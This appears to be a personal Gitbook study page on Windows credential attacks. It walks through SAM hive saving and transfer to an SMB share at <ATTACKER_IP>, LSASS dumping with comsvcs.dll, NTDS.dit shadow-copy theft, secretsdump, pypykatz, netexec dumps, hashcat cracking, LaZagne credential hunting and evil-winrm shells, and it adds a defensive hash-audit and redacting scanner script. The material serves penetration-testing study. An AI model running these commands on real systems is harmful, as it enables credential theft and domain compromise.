Noirchapeau's Gitbook

Windows Local Password Attacks

Credential Storage Mechanisms

Security Account Manager (SAM) Database

  • Purpose: Stores local account password hashes on standalone Windows systems

  • Location: the registry hives hklm\sam (the hashes), hklm\system (the boot key needed to decrypt them) and hklm\security (LSA secrets)

  • Scope: Local user accounts on individual Windows machines

  • Functionality:

    • Stores password hashes for local user accounts

    • Extracted hashes can be cracked offline, away from the target

    • Primary credential store for non-domain-joined computers

Local Security Authority Subsystem Service (LSASS)

  • Purpose: Central credential management process in Windows

  • Location: the lsass.exe process, which runs as SYSTEM

  • Functionality:

    • Caches credentials locally in memory

    • Creates and manages access tokens

    • Handles authentication processes

    • Stores credentials for:

      • Currently logged-in users

      • Cached domain credentials

      • Service account credentials

  • Security Implications:

    • Primary target for credential dumping attacks

    • Stores credentials in memory in various formats

    • Can retain credentials even after user logout

NT Directory Services (NTDS.dit)

  • Purpose: Primary database for Active Directory domain controllers

  • Location: %SystemRoot%\NTDS\NTDS.dit

  • Scope: Enterprise-wide credential storage in Windows domain environments

  • Functionality:

    • Stores user account information for entire Windows domain

    • Contains:

      • User account credentials

      • Group Policy information

      • Domain controller configuration

      • Replication metadata

    • Centralized authentication mechanism for domain-joined computers

    • Enables domain-wide login and access control

  • Key Characteristics:

    • Encrypted at rest: the hash data is protected by a key that is itself protected by the boot key in the SYSTEM hive, so the SYSTEM hive is needed alongside the file

    • Requires specific extraction techniques, because the file is locked while the domain controller is running

    • Contains more comprehensive user information compared to SAM database

SAM Database Attack Methodology

Registry Hive Extraction

  • Requires administrative privileges (run the commands from an elevated prompt)

  • Extracts critical registry hives containing password hashes

  • Command to Save Hives:

    reg.exe save hklm\sam C:\sam.save
    reg.exe save hklm\system C:\system.save
    reg.exe save hklm\security C:\security.save

Transferring Hives to Attack Host

  1. Set Up SMB Server:

    sudo python3 /usr/share/doc/python3-impacket/examples/smbserver.py -smb2support CompData /path/to/save
  2. Move Hive Files:

    move sam.save \\<ATTACKER_IP>\CompData
    move system.save \\<ATTACKER_IP>\CompData
    move security.save \\<ATTACKER_IP>\CompData

Hash Extraction with Impacket

  • Uses Impacket's secretsdump.py to extract password hashes

python3 /usr/share/doc/python3-impacket/examples/secretsdump.py -sam sam.save -security security.save -system system.save LOCAL

LSASS Memory Dumping Methods

Method 1: Memory Dump Creation with Task Manager (GUI)

  • Steps:

    1. Open Task Manager.

    2. Go to the Processes tab.

    3. Find and right-click lsass.exe.

    4. Select Create dump file.

  • File Location: C:\Users\<loggedonuser>\AppData\Local\Temp\lsass.DMP

  • Transfer: copy the dump to the attack host with the same SMB share method used for the SAM hives above.

Method 2: Memory Dump Creation with Rundll32.exe & Comsvcs.dll (CLI)

  • Retrieve the lsass.exe PID with:

    • Command Prompt:

      tasklist /svc | findstr lsass
    • PowerShell:

      Get-Process lsass
  • Use rundll32.exe to call the MiniDump export of comsvcs.dll and write the process memory to disk (from an elevated prompt):

rundll32.exe C:\windows\system32\comsvcs.dll, MiniDump <PID> C:\lsass.dmp full
  • Note:

    • Flagged by most modern AV tools.

    • AV bypass techniques may be required.

Credential Extraction

  • Pypykatz (a Python reimplementation of Mimikatz's LSASS parsing) extracts the credentials from the dump offline on the attack host

pypykatz lsa minidump /path/to/lsass.dmp

Active Directory (NTDS.dit) Attacks

Dictionary Attack

  • Attempts authentication against the domain controller with each password in a list of candidates (the domain's account lockout policy applies)

netexec smb <DC_IP> -u <username> -p <password_list>

NTDS.dit Capture Methods

  1. Volume Shadow Copy (NTDS.dit is locked while the DC runs, so it is copied from a shadow copy; use the Shadow Copy Volume Name that vssadmin prints, HarddiskVolumeShadowCopy1 below is only an example):

    vssadmin create shadow /For=C:
    cmd.exe /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\NTDS\NTDS.dit
    cmd.exe /c move C:\NTDS\NTDS.dit \\<attack_host_IP>\<share_name>
  2. NetExec (CrackMapExec's maintained successor) Method:

    netexec smb <DC_IP> -u <username> -p <password> --ntds

Cracking Hashes with Hashcat

  1. Prepare Hash File (hashestocrack.txt), one NT hash per line:

    64f12cddaa88057e06a81b54e73b949b
    31d6cfe0d16ae931b73c59d7e0c089c0
  2. Crack Hashes (-m 1000 is hashcat's NTLM mode, i.e. NT hashes):

    sudo hashcat -m 1000 hashestocrack.txt /usr/share/wordlists/rockyou.txt
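What hashcat is doing here is worth seeing at the byte level. The following is an added example, not from these notes: it implements NT hashing (MD4 over the UTF-16LE encoding of the password, with no salt) in pure Python, confirms that the second hash in the file above is the hash of an empty password, and runs a defender-side audit over a constructed secretsdump-style dump that flags empty passwords, passwords from a banned list, and accounts that share a password. MD4 is implemented by hand because hashlib on OpenSSL 3 builds often does not provide it; the account names, RIDs and the banned list are constructed.

```python
"""Added example (not from the original notes): NT hash computation and a
hash-dump audit. hashcat mode 1000 targets NT hashes, which are MD4 over the
UTF-16LE password with no salt, so equal passwords give equal hashes and the
empty password always hashes to 31d6cfe0d16ae931b73c59d7e0c089c0. The sample
dump below is constructed in secretsdump's user:rid:lmhash:nthash::: format.
"""
import struct

MASK32 = 0xFFFFFFFF
EMPTY_NT_HASH = "31d6cfe0d16ae931b73c59d7e0c089c0"  # MD4 of the empty string


def _rotl(x, n):
    return ((x << n) | (x >> (32 - n))) & MASK32


def _f(x, y, z):
    return (x & y) | ((~x & MASK32) & z)


def _g(x, y, z):
    return (x & y) | (x & z) | (y & z)


def _h(x, y, z):
    return x ^ y ^ z


# (function, additive constant, message-word order, per-step shifts) for each RFC 1320 round
_ROUNDS = (
    (_f, 0x00000000, tuple(range(16)), (3, 7, 11, 19)),
    (_g, 0x5A827999, (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15), (3, 5, 9, 13)),
    (_h, 0x6ED9EBA1, (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15), (3, 9, 11, 15)),
)


def md4(data: bytes) -> bytes:
    """Pure-Python MD4 (RFC 1320); fine for an audit of a few hashes, not for bulk work."""
    msg = bytearray(data) + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)          # pad to 56 mod 64
    msg += struct.pack("<Q", (len(data) * 8) & 0xFFFFFFFFFFFFFFFF)  # bit length, little-endian
    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        aa, bb, cc, dd = a, b, c, d
        for fn, const, order, shifts in _ROUNDS:
            for i, k in enumerate(order):
                a = _rotl((a + fn(b, c, d) + x[k] + const) & MASK32, shifts[i % 4])
                a, b, c, d = d, a, b, c   # rotate registers so the next step updates the next one
        a, b, c, d = (a + aa) & MASK32, (b + bb) & MASK32, (c + cc) & MASK32, (d + dd) & MASK32
    return struct.pack("<4I", a, b, c, d)


def nt_hash(password: str) -> str:
    """NT hash: MD4 over UTF-16LE, unsalted, hex-encoded as in the hash file above."""
    return md4(password.encode("utf-16-le")).hex()


def audit_dump(dump_text: str, banned_passwords) -> list:
    """Flag empty passwords, banned passwords and accounts that share a password."""
    banned = {nt_hash(p): p for p in banned_passwords}
    first_seen = {}
    findings = []
    for line in dump_text.splitlines():
        parts = line.strip().split(":")
        if len(parts) < 4:
            continue
        user, nt = parts[0], parts[3].lower()
        if nt == EMPTY_NT_HASH:
            findings.append((user, "empty password"))
        elif nt in banned:
            findings.append((user, f"banned password '{banned[nt]}'"))
        if nt in first_seen and nt != EMPTY_NT_HASH:
            findings.append((user, f"same password as {first_seen[nt]}"))
        first_seen.setdefault(nt, user)
    return findings


# Constructed dump; the second NT hash is the page's empty-password constant.
SAMPLE_DUMP = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
svc_backup:1001:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::
"""

if __name__ == "__main__":
    for user, issue in audit_dump(SAMPLE_DUMP, ["password", "Welcome1"]):
        print(f"{user}: {issue}")
```

The "same password as" finding falls straight out of the missing salt: two accounts with equal NT hashes have equal passwords, which is also why a single captured hash is reusable for pass-the-hash. An audit like this, run by the domain owner against a banned-password list, is the defensive counterpart of the hashcat step above.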

Credential Hunting Commands

Lazagne Credential Extraction

  • Comprehensive tool for extracting credentials from various applications

lazagne.exe all
# Verbose mode
lazagne.exe all -vv

Findstr Credential Search

  • Recursively searches files (/S) for the string "password", case-insensitively (/I), printing only the names of matching files (/M)

findstr /SIM /C:"password" *.txt *.ini *.cfg *.config *.xml *.git *.ps1 *.yml

Key Terms for Credential Discovery

  • Generic: password, passphrase, keys, username, creds, users, pwd, login, credentials

  • Application-specific: configuration, dbcredential, dbpassword, passkeys, passphrases
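A bare findstr reports every file that merely contains one of these words. The following is an added example, not from these notes: a scanner that uses the key terms above but only reports key/value assignments (ini, yaml and PowerShell style key = value, and web.config <add key value> entries), skips comment lines and templated placeholders such as ${VAR}, and redacts the value so that the report does not itself become a credential leak. The sample files are constructed for the example.

```python
"""Added example (not from the original notes): a scanner for the credential
key terms listed above. Unlike a bare findstr it only reports key=value style
assignments, skips comment lines and template placeholders, and redacts the
value in its output. The sample files are constructed; nothing is read from disk.
"""
import re

GENERIC_TERMS = ["password", "passphrase", "keys", "username", "creds", "users", "pwd", "login", "credentials"]
APP_TERMS = ["configuration", "dbcredential", "dbpassword", "passkeys", "passphrases"]
# Longest terms first so e.g. "passphrases" is matched whole rather than as "passphrase".
TERMS = "|".join(sorted(set(GENERIC_TERMS + APP_TERMS), key=len, reverse=True))

# key = value / key: value (ini, yaml, ps1, plain text)
ASSIGN = re.compile(rf"\b(?P<key>[\w.\-]*(?:{TERMS})[\w.\-]*)\s*[=:]\s*[\"']?(?P<value>[^\"'\s;,]+)", re.I)
# <add key="..." value="..."/> (web.config / app.config)
XML_ADD = re.compile(rf"key=[\"'](?P<key>[^\"']*(?:{TERMS})[^\"']*)[\"']\s+value=[\"'](?P<value>[^\"']*)[\"']", re.I)

COMMENT_PREFIXES = ("#", ";", "//")
PLACEHOLDER_PREFIXES = ("${", "{{", "%", "<")   # templated values, not stored secrets


def redact(value: str) -> str:
    """Keep two characters for triage and mask the rest."""
    return value[:2] + "*" * (len(value) - 2)


def scan_text(name: str, text: str) -> list:
    """Return (file, line_no, key, redacted_value) for each credential-looking assignment."""
    findings = []
    for line_no, line in enumerate(text.splitlines(), start=1):
        if line.strip().startswith(COMMENT_PREFIXES):
            continue
        match = XML_ADD.search(line) or ASSIGN.search(line)
        if not match:
            continue
        value = match.group("value")
        if value.startswith(PLACEHOLDER_PREFIXES):
            continue
        findings.append((name, line_no, match.group("key"), redact(value)))
    return findings


def scan_files(files: dict) -> list:
    """Scan a {filename: contents} mapping and concatenate the findings."""
    return [hit for name, text in files.items() for hit in scan_text(name, text)]


# Constructed sample files exercising each case the scanner handles.
SAMPLE_FILES = {
    "web.config": (
        "<configuration>\n"
        "  <appSettings>\n"
        '    <add key="timeout" value="30" />\n'
        '    <add key="dbpassword" value="S3cret!Pass" />\n'
        "  </appSettings>\n"
        "</configuration>\n"
    ),
    "app.ini": "[database]\nusername = svc_app\npassword = Winter2024!\n; password = old-value\n",
    "deploy.yml": "db_password: ${DB_PASSWORD}\nlogin: admin\n",
    "notes.txt": "Remember to rotate the password quarterly.\n",
}

if __name__ == "__main__":
    for name, line_no, key, masked in scan_files(SAMPLE_FILES):
        print(f"{name}:{line_no}: {key} = {masked}")
```

The notes.txt line and the commented-out ini entry are exactly the hits a plain findstr would return and this scanner does not, and the ${DB_PASSWORD} reference is skipped because an environment-variable placeholder is the pattern that should replace literal values in the first place.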

Remote Authentication Attacks

CrackMapExec / NetExec Remote Attacks

  • Dump LSA Secrets:

    netexec smb <TARGET_IP> --local-auth -u <USER> -p <PASSWORD> --lsa
  • Dump SAM Remotely:

    netexec smb <TARGET_IP> --local-auth -u <USER> -p <PASSWORD> --sam
  • Dump NTDS Remotely:

    netexec smb <TARGET_IP> --local-auth -u <USER> -p <PASSWORD> --ntds

Post-Compromise Enumeration

Local Group Membership

  • Lists the local groups on the host; append a group name to list that group's members

net localgroup

User Privileges

  • Shows the account's details, including its local group memberships and password settings

net user <username>

Remote Shell Access

  • Interactive shell over WinRM (TCP 5985/5986) using recovered credentials

evil-winrm -i <DC_IP> -u <username> -p <password>

Key Considerations

  • Requires administrative or elevated privileges

  • Most techniques are detectable by modern antivirus

  • Potential to trigger security alerts

  • Ethical use limited to authorized penetration testing

Defensive Recommendations

  • Implement strong password policies

  • Use multi-factor authentication

  • Regularly update and patch systems

  • Monitor and log authentication events
